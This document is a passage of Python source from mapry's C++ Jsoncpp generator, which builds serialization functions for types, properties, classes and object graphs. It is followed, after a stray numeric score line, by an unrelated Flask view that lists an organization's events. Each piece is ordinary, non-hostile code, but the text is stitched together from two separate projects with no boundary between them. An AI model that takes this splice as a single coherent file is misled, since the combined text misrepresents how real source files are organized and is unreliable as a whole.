    item_serialization = _serialize_value(
        target_expr=entry_target,
        value_expr=entry_source,
        a_type=a_type.values,
        auto_id=auto_id,
        cpp=cpp)

    return _SERIALIZE_MAP_TPL.render(
        uid=uid,
        value_expr=value_expr,
        item_serialization=item_serialization,
        target_expr=target_expr)
@ensure(lambda result: not result.endswith('\n'))
def _serialize_value(
        target_expr: str, value_expr: str, a_type: mapry.Type, auto_id: _AutoID,
        cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize the ``value_expr`` into the ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_type: the mapry type of the value
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated serialization code
    """
    # Primitive values translate to a single assignment.
    if isinstance(a_type,
                  (mapry.Boolean, mapry.Integer, mapry.Float, mapry.String)):
        return '{} = {};'.format(target_expr, value_expr)

    if isinstance(a_type, mapry.Path):
        return "{} = {}.string();".format(target_expr, value_expr)

    if isinstance(a_type, (mapry.Date, mapry.Datetime)):
        return _serialize_date_time(
            target_expr=target_expr,
            value_expr=value_expr,
            a_type=a_type,
            cpp=cpp)

    if isinstance(a_type, mapry.Time):
        return _serialize_time(
            target_expr=target_expr,
            value_expr=value_expr,
            a_type=a_type,
            cpp=cpp)

    if isinstance(a_type, mapry.TimeZone):
        return _serialize_time_zone(
            target_expr=target_expr, value_expr=value_expr, cpp=cpp)

    if isinstance(a_type, mapry.Duration):
        return '{} = duration_to_string({});'.format(target_expr, value_expr)

    # Aggregates recurse through their dedicated generators.
    if isinstance(a_type, mapry.Array):
        return _serialize_array(
            target_expr=target_expr,
            value_expr=value_expr,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    if isinstance(a_type, mapry.Map):
        return _serialize_map(
            target_expr=target_expr,
            value_expr=value_expr,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    # Class instances are referenced by their ID.
    if isinstance(a_type, mapry.Class):
        return "{} = {}->id;".format(target_expr, value_expr)

    # Embeddable structures are serialized by their generated function.
    if isinstance(a_type, mapry.Embed):
        return "{} = serialize_{}({});".format(
            target_expr, mapry.cpp.naming.as_variable(a_type.name), value_expr)

    raise NotImplementedError(
        "Unhandled serialization of type: {}".format(a_type))
# Jinja2 template: wrap a serialization snippet in a truthiness check so
# that unset optional values are skipped.
_SERIALIZE_OPTIONAL_PROPERTY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
    '''\
if ({{ value_expr }}) {
{{ serialization|indent }}
}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_property(
        target_expr: str, value_expr: str, a_property: mapry.Property,
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize the property.

    The value of the property is given as ``value_expr`` and serialized
    into the ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_property: the property definition
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated serialization code
    """
    optional = a_property.optional

    # Optional values are dereferenced with ``*`` before serialization.
    serialization = _serialize_value(
        target_expr=target_expr,
        value_expr="(*{})".format(value_expr) if optional else value_expr,
        a_type=a_property.type,
        auto_id=auto_id,
        cpp=cpp)

    if not optional:
        return serialization

    # Guard the snippet so that unset optionals are skipped at runtime.
    return _SERIALIZE_OPTIONAL_PROPERTY_TPL.render(
        value_expr=value_expr, serialization=serialization)
_SERIALIZE_CLASS_OR_EMBED_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value serialize_{{ composite.name|as_variable }}(
const {{ composite.name|as_composite }}& {{
composite.name|as_variable }}) {
{% set value = "%s_as_value"|format(composite.name|as_variable) %}
{% if property_serializations %}
Json::Value {{ value }};
{% for serialization in property_serializations %}
{{ serialization|indent }}
{% endfor %}
return {{ value }};
{% else %}
return Json::objectValue;
{% endif %}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_class_or_embed(
        class_or_embed: Union[mapry.Class, mapry.Embed], cpp: mapry.Cpp) -> str:
    """
    Generate the function to serialize a class or an embeddable structure.

    :param class_or_embed:
        a mapry definition of the class or the embeddable structure
    :param cpp: C++ settings
    :return: generated code
    """
    value_expr = mapry.cpp.naming.as_variable(class_or_embed.name)

    auto_id = _AutoID()

    # One serialization snippet per property; the target is the field of
    # the local Json::Value named after the composite.
    # yapf: disable
    property_serializations = [
        _serialize_property(
            target_expr="{}_as_value[{}]".format(
                mapry.cpp.naming.as_variable(class_or_embed.name),
                mapry.cpp.generate.escaped_str(prop.json)),
            value_expr="{}.{}".format(value_expr, prop.name),
            a_property=prop,
            auto_id=auto_id,
            cpp=cpp)
        for prop in class_or_embed.properties.values()
    ]
    # yapf: enable

    return _SERIALIZE_CLASS_OR_EMBED_TPL.render(
        composite=class_or_embed,
        property_serializations=property_serializations)
_SERIALIZE_GRAPH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
Json::Value serialize_{{ graph.name|as_variable }}(
const {{ graph.name|as_composite }}& {{ graph.name|as_variable }}) {
{% set value = "%s_as_value"|format(graph.name|as_variable) %}
{% if property_serializations or graph.classes %}
Json::Value {{ value }};
{% for serialization in property_serializations %}
{{ serialization|indent }}
{% endfor %}{# /for property_serializations #}
{% for cls in graph.classes.values() %}
if (!{{ graph.name|as_variable }}.{{ cls.plural|as_variable }}.empty()) {
Json::Value {{ cls.plural|as_variable }}_as_value;
for (const auto& kv : {{
graph.name|as_variable }}.{{ cls.plural|as_variable }}) {
const std::string& id = kv.first;
const {{ cls.name|as_composite }}* instance = kv.second.get();
if (id != instance->id) {
constexpr auto expected(
"Expected the class instance of "
{{ cls.name|as_composite|escaped_str }}
"to have the ID ");
constexpr auto but_got(", but got: ");
std::string msg;
msg.reserve(
strlen(expected) + id.size() +
strlen(but_got) + instance->id.size());
msg += expected;
msg += id;
msg += but_got;
msg += instance->id;
throw std::invalid_argument(msg);
}
{{ cls.plural|as_variable }}_as_value[instance->id] = {#
#}serialize_{{ cls.name|as_variable }}(*instance);
}
{{ value }}[{{ cls.plural|json_plural|escaped_str }}] = {{
cls.plural|as_variable }}_as_value;
}
{% endfor %}{# /for cls #}
return {{ value }};
{% else %}{## case no properties nor classes ##}
return Json::objectValue;
{% endif %}{# /if property_serializations or graph.classes #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_graph(graph: mapry.Graph, cpp: mapry.Cpp) -> str:
    """
    Generate the implementation of the function that serializes a mapry graph.

    :param graph: mapry definition of the object graph
    :param cpp: C++ settings
    :return: generated code
    """
    graph_var = mapry.cpp.naming.as_variable(graph.name)
    value_var = "{}_as_value".format(graph_var)

    auto_id = _AutoID()

    # Snippets for the graph-level properties; the class registries are
    # handled directly inside the template.
    property_serializations = [
        _serialize_property(
            target_expr="{}[{}]".format(
                value_var, mapry.cpp.generate.escaped_str(prop.json)),
            value_expr="{}.{}".format(graph_var, prop.name),
            a_property=prop,
            auto_id=auto_id,
            cpp=cpp)
        for prop in graph.properties.values()
    ]

    return _SERIALIZE_GRAPH_TPL.render(
        graph=graph, property_serializations=property_serializations)
@ensure(lambda result: result.endswith('\n'))
def generate(
        graph: mapry.Graph, cpp: mapry.Cpp, types_header_path: str,
        parse_header_path: str, jsoncpp_header_path: str) -> str:
    """
    Generate the implementation file for de/serialization from/to Jsoncpp.

    :param graph: definition of the object graph
    :param cpp: C++ settings
    :param types_header_path: defines the types of the object graph
    :param parse_header_path: defines the general parsing structures
    :param jsoncpp_header_path:
        defines parsing and serializing functions from/to Jsoncpp
    :return: content of the implementation file
    """
    ##
    # Header
    ##

    # The file is assembled as a list of text blocks which are joined with
    # blank lines at the end.
    blocks = [
        mapry.cpp.generate.WARNING,
        _includes(
            graph=graph,
            types_header_path=types_header_path,
            parse_header_path=parse_header_path,
            jsoncpp_header_path=jsoncpp_header_path,
            cpp=cpp)
    ]

    namespace_parts = cpp.namespace.split('::')
    if namespace_parts:
        # Open one nested namespace per part, e.g. "a::b" -> two openings.
        namespace_opening = '\n'.join([
            'namespace {} {{'.format(namespace_part)
            for namespace_part in namespace_parts
        ])
        blocks.append(namespace_opening)

    blocks.append("namespace jsoncpp {")

    ##
    # Parse
    ##

    blocks.append(_message_function())

    # Regex constants are emitted only when some type actually needs them.
    regex_constants_text = _regex_constants(graph=graph)
    if regex_constants_text != '':
        blocks.append(regex_constants_text)

    if mapry.needs_type(a_type=graph, query=mapry.Duration):
        blocks.append(_duration_from_string())

    blocks.append(_value_type_to_string())

    blocks.append(_parse_graph(graph=graph, cpp=cpp))

    ##
    # Serialize
    ##

    if cpp.datetime_library == 'ctime':
        # The ctime backend needs a string-formatting helper whenever any
        # temporal type occurs in the graph; date.h needs no extra helper.
        # yapf: disable
        if any(mapry.needs_type(a_type=graph, query=query_type)
               for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
            # yapf: enable
            blocks.append(_datetime_to_string())
    elif cpp.datetime_library == 'date.h':
        pass
    else:
        raise NotImplementedError(
            "Unhandled datetime library: {}".format(cpp.datetime_library))

    if mapry.needs_type(a_type=graph, query=mapry.Duration):
        blocks.append(_duration_to_string())

    # Classes and embeds share the same parse/serialize treatment.
    nongraph_composites = []  # type: List[Union[mapry.Class, mapry.Embed]]
    nongraph_composites.extend(graph.classes.values())
    nongraph_composites.extend(graph.embeds.values())

    for class_or_embed in nongraph_composites:
        blocks.append(_parse_composite(composite=class_or_embed, cpp=cpp))

    for class_or_embed in nongraph_composites:
        blocks.append(
            _serialize_class_or_embed(class_or_embed=class_or_embed, cpp=cpp))

    blocks.append(_serialize_graph(graph=graph, cpp=cpp))

    blocks.append("} // namespace jsoncpp")

    ##
    # Footer
    ##

    if namespace_parts:
        # Close the namespaces in reverse order of opening.
        # yapf: disable
        namespace_closing = '\n'.join(
            ['}} // namespace {}'.format(namespace_part)
             for namespace_part in reversed(namespace_parts)])
        # yapf: enable
        blocks.append(namespace_closing)

    blocks.append(mapry.cpp.generate.WARNING)

    text = '\n\n'.join(blocks) + '\n'

    return mapry.indention.reindent(text=text, indention=cpp.indention)
# | 2.515625 | 3 |
# relier/web/views/events.py
from relier.web.views import AuthenticatedView
from relier.models import Event
from flask import g, render_template
class Events(AuthenticatedView):
    """List the events of the authenticated user's organization."""

    def get(self):
        """Render the event listing, or the onboarding page when empty."""
        # order_by returns a new query rather than mutating in place, so its
        # result must be kept; the original discarded it and the listing
        # stayed unordered.
        events = (
            Event.select()
            .where(Event.organization == g.user.organization)
            .order_by(Event.start_time.desc()))

        if events.count() == 0:
            return render_template('get_started.j2')

        return render_template('events.j2', events=events)